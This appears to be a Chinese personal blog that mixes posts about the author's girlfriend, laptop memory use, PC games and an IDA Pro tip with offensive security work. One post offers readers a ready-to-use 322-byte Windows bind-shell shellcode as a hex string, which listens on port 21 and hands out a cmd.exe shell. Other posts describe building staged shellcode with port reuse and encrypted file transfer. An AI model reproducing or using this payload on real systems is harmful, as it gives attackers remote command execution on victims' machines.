今天是感恩节，收到了来自她的感言，虽然只有平淡的一句话，但我却能感受到真心。

我是个粗心的家伙，所以今天都浑浑噩噩的，没有和她一起好好庆祝这个节日。

其实心里有好多话想对她说，却不知该从何开始。

但从那天那一刻起，我的眼里只有她，再容不下其他人了！

thanks to swan

也不是什么好东西，发一个方便大家用，比较小一点，只有322bytes，LSD那个方法编译出来有500多bytes，呵呵

port 是倒数第四个字节起的2个字节.  这里默认是21端口，\x15\x00

/* 322 bytes */
"\xe9\x10\x01\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x03\x59\xe8\xb0\x00\x00\x00"
"\xe2\xf9\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\xff\x16\x8b"
"\xe8\x6a\x06\x59\xe8\x97\x00\x00\x00\xe2\xf9\x33\xdb\x43\xff\x56"
"\x20\x83\xfb\x64\x75\xf7\x83\xc7\x04\x81\xec\x90\x01\x00\x00\x54"
"\x68\x01\x01\x00\x00\xff\x56\x0c\x50\x50\x50\x50\x6a\x01\x6a\x02"
"\xff\x56\x10\x8b\xd8\x33\xc0\x50\x50\x66\x8b\x56\x24\x86\xd6\xc1"
"\xca\x10\x66\xba\x02\x00\x52\x8b\xd4\x6a\x10\x52\x53\xff\x56\x14"
"\x6a\x01\x53\xff\x56\x18\x50\x50\x53\xff\x56\x1c\x8b\xd8\x68\x63"
"\x6d\x64\x00\x8d\x14\x24\x83\xec\x54\x8b\xfc\x6a\x14\x59\x33\xc0"
"\x89\x04\x8f\xe2\xfb\xc6\x47\x10\x44\xfe\x47\x3c\xfe\x47\x3d\x89"
"\x5f\x48\x89\x5f\x4c\x89\x5f\x50\x8d\x47\x10\x57\x50\x51\x51\x51"
"\x6a\x01\x51\x51\x52\x51\xff\x56\x04\x33\xc0\x48\x50\xff\x56\x08"
"\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b\x76\x20\x03"
"\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10\x3a\xd6\x74"
"\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7\x5e\x8b\x5e"
"\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03"
"\xc5\xab\x5e\x59\xc3\xe8\xeb\xfe\xff\xff\x32\x74\x91\x0c\xc9\xbc"
"\xa6\x6b\x8f\xf2\x18\x61\x3d\x6a\xb4\x80\x2d\x32\x78\xde\x64\x10"
"\xa7\xdd\x0c\x9f\xd3\x4b\xb1\x1e\x97\x01\x7c\xe2\x9b\x7c\x15\x00"
"\xbf\xe5";

另外to my honey gf，看，我这不是发东西了哈~~~~，西西

其实我的本本也不差了，1G内存。

可是现在基本上开机后，启动完就去了500M内存左右：

各类IM开了3、4个，有时候更多，尤其是QQ，超级耗资源。

然后outlook2003也要一直挂着，及时收邮件，这个玩意收信的时候简直就别想干别的事了。

播放器一个，一边听歌一边工作。

网页若干，我一般是喜欢开十几个网页放着，用X浏览器，不知道是firefox的原因还是X浏览器的原因，尤其耗资源。

卡巴一个，经常被他搞的进入假死状态。

google desktop一个：居家旅行必备工具。

然后就是工作需要，cmd窗口若干，secureCRT或putty窗口若干，win终端连接若干

有时候还有vmware虚拟机开一个，C++编译器一个，要是还开OD或IDA PRO就更惨了

本来我是RSS的狂热爱好着，为了以上那些“必需品”，放弃掉RSS了，还好同事向我推荐了一个好网站
www.zhuaxia.com ,在他网站上聚合RSS，不用再down回本地了，真正体验到了web2。0带来的好处，不然真吃不消。

现在游戏的配置也越来越BT了，光大不说，最近的魔法门10，全面战争：中世纪2，无冬2，等等，都TMD的超过4。5G了，一张DVD5还刻不下,中世纪2安装完后据说有10G，真是无语。。。。。

对机器配置也高的出奇。

没优化好的哥特3不说，魔法门10我7600GT的显卡，intel双核，都只能开中等配置玩。

要玩游戏，1G内存已经落伍了，必须赶快升级到2G才行。。。。。。

真是疯狂的时代！

metasploit的stage shellcode看不明白是怎么搞的，呵呵，一个套一个的，没仔细跟了。

今天继续修改了stage shellcode，现在stage2支持端口复用，文件上传下载，传输过程加密了，呵呵。

死了好多脑细胞。。。。。。

明天继续  ：）

另外注意到 ida pro 5里面反汇编的程序，在恢复栈平衡时，都是调用函数前先

mov    esi,  esp

调用完后，

cmp   esi,esp

jz    __chkesp

然后如果不对，就跳转到  __chkesp ,去恢复栈平衡。

一点小tips。

    我还活着，上来吼两声。

    这段时间一直没有更新blog，是因为不方便写的东西比较多，并不是偷懒。

    最近在 emm的提点下，写了下windows的stage shellcode，这个东西真是方便，用这个可以没有shellcode的长度和badchar的限制，呵呵。

    另外，我的宝贝过生日了，祝她天天开心，西西~~（一切尽在不言中哈……）

无题